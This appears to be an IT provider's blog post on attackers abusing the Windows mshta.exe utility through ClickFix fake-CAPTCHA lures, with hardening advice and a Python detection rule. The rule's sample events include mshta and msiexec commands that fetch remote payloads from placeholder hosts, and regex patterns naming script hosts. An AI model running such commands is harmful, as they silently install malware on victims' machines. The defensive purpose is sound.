Bitdefender researchers this week disclosed a sharp rise in attacks abusing MSHTA — a Microsoft-signed Windows utility that has been sitting on every Windows PC since 1999 — to silently install password stealers, loaders, and backdoors. Because mshta.exe is a trusted, built-in component of Windows, the malicious activity blends into normal system behavior and routinely slips past antivirus. For small businesses, this is the kind of attack your team can trigger with a single bad click on a fake CAPTCHA or a 'free software' download.
What MSHTA is, and why attackers love it
MSHTA (Microsoft HTML Application Host) is a legacy Windows utility from the Internet Explorer era that can execute VBScript and JavaScript from local or remote files. It has been part of Windows since 1999, when it shipped with Windows 98 SE and Internet Explorer 5.0, and it remains present in every release since, including current ones.
The problem is that legitimate use has cratered while attacker use has exploded. Bitdefender Labs reports a notable rise in detections involving mshta.exe over recent months, suggesting that attackers are increasingly relying on this LOLBIN (living-off-the-land binary) as legitimate enterprise use steadily declines. Because the binary is Microsoft-signed and trusted by many security products and enterprise environments, attackers use it to blend malicious activity with legitimate system operations. Bitdefender says the tool is especially attractive because it can retrieve remote payloads, execute scripts in memory, and hand off execution to PowerShell or other Windows components without dropping obvious malware files onto disk.
In plain English: attackers don't need to smuggle a malware file past your antivirus. They use a tool Microsoft already shipped you.
The 'ClickFix' lure your employees will actually fall for
Most of these campaigns start with social engineering, not an exploit. In the campaigns Bitdefender reviewed, users were lured through fake software downloads, phishing links, Discord messages, ClickFix-style prompts, search-engine manipulation and fake human-verification pages that encouraged them to copy and run malicious commands.
Here's the kicker — the ClickFix trick. Threat actors ran Emmenhtal Loader campaigns that abused fake CAPTCHA verification pages distributed through Discord phishing messages. Victims were tricked into copying malicious commands into the Windows Run dialog under the pretext of "prove you are human". MSHTA executed obfuscated HTA payloads in memory before launching PowerShell to fetch additional malware, ultimately delivering LummaStealer in one analyzed case.
An employee searches for a free PDF tool, lands on a fake page, is told to press Windows+R and paste a command to "verify they're human," and the workstation is silently compromised. No file downloaded. No antivirus alert.
What's actually being installed
The payloads matter because they translate directly into business risk. Bitdefender linked the tool to campaigns involving malware families including LummaStealer, Amatera, CountLoader, Emmenhtal Loader, ClipBanker and PurpleFox.
LummaStealer and Amatera are credential and browser-data thieves — meaning saved passwords, session cookies, and banking logins. Bitdefender also documented MSHTA abuse in ClipBanker campaigns targeting cryptocurrency users. In those attacks, remote HTA scripts launched hidden PowerShell commands that downloaded secondary payloads designed to establish persistence, disable defenses, and replace cryptocurrency wallet addresses copied to the clipboard. PurpleFox goes deeper: researchers observed PurpleFox operators using MSHTA to launch msiexec commands that downloaded MSI installers disguised as PNG image files. Once installed, PurpleFox deployed a rootkit-enabled backdoor capable of persistence, remote command execution, information theft, and DDoS functionality.
What your managed-IT provider should be doing this week
There are concrete, MSP-level actions that shut this attack class down — and most SMBs don't have them in place by default. Disable MSHTA if not required for business operations and block HTA file execution using Group Policy or application control.
The broader playbook your provider should already be running, as part of our managed IT services lineup:
- Restrict or fully block mshta.exe and wscript.exe via application allow-listing on workstations that don't need them.
- Deploy endpoint detection that watches behavior, not just file signatures. Security strategies must go beyond signature-based detection and focus on behavioral monitoring, least privilege, and proactive hardening.
- Train staff specifically on the ClickFix lure — any prompt that asks an employee to paste a command into the Windows Run dialog is hostile, full stop.
- Lock down what gets installed. Most ClickFix infections start with someone hunting for "free" software.
Use endpoint security solutions capable of monitoring behavioral anomalies, script execution patterns, and in-memory activity. If your current IT provider can't tell you whether mshta.exe is restricted on your fleet, that's the conversation to have this week.
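To make "behavioral monitoring" concrete, here is an added example (not code from Bitdefender, York Computer or any of the sources above) of the kind of rule an EDR or SIEM would run over process-creation telemetry. It encodes the three behaviors the campaigns above share: mshta.exe pointed at a remote source, mshta.exe launched from the Run dialog (Explorer as parent), and mshta.exe spawning PowerShell or msiexec, including the PurpleFox pattern of an MSI fetched under an image-file name. The event shape, rule names, severity weights and all sample events are constructed for illustration; real Sysmon or EDR records carry more fields and your thresholds will differ.

```python
"""Behavioral detection of mshta.exe abuse over process-creation events.

Added example; not Bitdefender's or York Computer's code. The event layout
mimics Sysmon Event ID 1 (parent image, image, command line) but is a
constructed simplification, and the rule names and weights are assumptions.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (constructed, Sysmon-like shape)."""
    parent_image: str
    image: str
    command_line: str


# Remote source: an http(s)/ftp URL or a UNC path on the command line.
REMOTE_SOURCE = re.compile(r"(?:https?|ftp)://|\\\\[\w.-]+\\", re.IGNORECASE)
# Children that mshta.exe has no ordinary business reason to spawn.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "msiexec.exe"}
# Package "disguised as an image" (PurpleFox pattern described in the article).
IMAGE_EXT = re.compile(r"\.(?:png|jpg|jpeg|gif|bmp)\b", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

# Assumed weights: a single strong indicator is enough to page someone.
SEVERITY = {
    "mshta_remote_source": 3,
    "mshta_spawned_script_host": 3,
    "msiexec_remote_package_image_extension": 4,
    "mshta_from_explorer": 1,      # also fires for legitimate local HTAs
    "hidden_window": 1,
}


def basename(path: str) -> str:
    """Last path component, lower-cased, for either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(ev: ProcEvent) -> list[str]:
    """Return the rule names that fire for one event, in a fixed order."""
    img, parent, cl = basename(ev.image), basename(ev.parent_image), ev.command_line
    findings: list[str] = []
    if img == "mshta.exe":
        if REMOTE_SOURCE.search(cl):
            findings.append("mshta_remote_source")
        if parent == "explorer.exe":           # Run dialog / double-click
            findings.append("mshta_from_explorer")
    if parent == "mshta.exe" and img in SCRIPT_HOSTS:
        findings.append("mshta_spawned_script_host")
        if HIDDEN_WINDOW.search(cl):
            findings.append("hidden_window")
        if img == "msiexec.exe" and REMOTE_SOURCE.search(cl) and IMAGE_EXT.search(cl):
            findings.append("msiexec_remote_package_image_extension")
    return findings


def verdict(findings: list[str]) -> tuple[str, int]:
    """Collapse findings into an analyst-facing verdict and its score."""
    score = sum(SEVERITY[f] for f in findings)
    if score >= 3:
        return "alert", score
    if score > 0:
        return "review", score
    return "ok", score


def scan(events: list[ProcEvent]) -> list[tuple[str, int, list[str]]]:
    """Run detect()+verdict() over a batch of events."""
    out = []
    for ev in events:
        f = detect(ev)
        v, s = verdict(f)
        out.append((v, s, f))
    return out


# Constructed sample telemetry; hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    # ClickFix-style: command pasted into the Run dialog, remote HTA
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://verify.example.invalid/captcha"),
    # The HTA hands off to a hidden PowerShell (command body redacted)
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -WindowStyle Hidden -NoProfile -Command <redacted>"),
    # PurpleFox-style: msiexec pulls a remote "PNG" that is really an MSI
    ProcEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://cdn.example.invalid/logo.png /q"),
    # Low-signal: a local HTA opened from Explorer (legitimate admin console)
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\Vendor\admin-console.hta"'),
    # Unrelated process creation
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev, (v, s, f) in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(f"{v:6} score={s} {basename(ev.parent_image)} -> {basename(ev.image)} {f}")
```

Two design points worth noting. The rules key on parent/child relationships and command-line shape rather than on file hashes, which is what lets them survive the in-memory, file-less handoff the article describes. And the weak "mshta launched from Explorer" rule is deliberately scored low: a workstation that legitimately runs a vendor HTA will trip it daily, so it feeds review queues, not pages, while remote sources and script-host children are treated as alerts on their own.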
What York Businesses Should Do
Most York County small businesses we talk to have never heard of MSHTA — and that's exactly the point. If you run Windows at your office, your team can trigger this attack today with a single bad click. York Computer can audit your endpoints for unnecessary legacy Windows tools and lock them down before someone in accounting copy-pastes a 'CAPTCHA verification' into the Run box.
Sources
- Legacy Windows Tool MSHTA Fuels Surge in Silent Malware Attacks — SecurityWeek
- Microsoft's MSHTA Legacy Tool Still Powers Malware Campaigns on Windows — Bitdefender Labs
- Microsoft's legacy MSHTA tool heavily abused in malware attacks — CyberInsider
- Internet Explorer may be dead, but its ghost still runs malware — CSO Online
- MSHTA abuse helps malware hide in Windows processes — SecurityBrief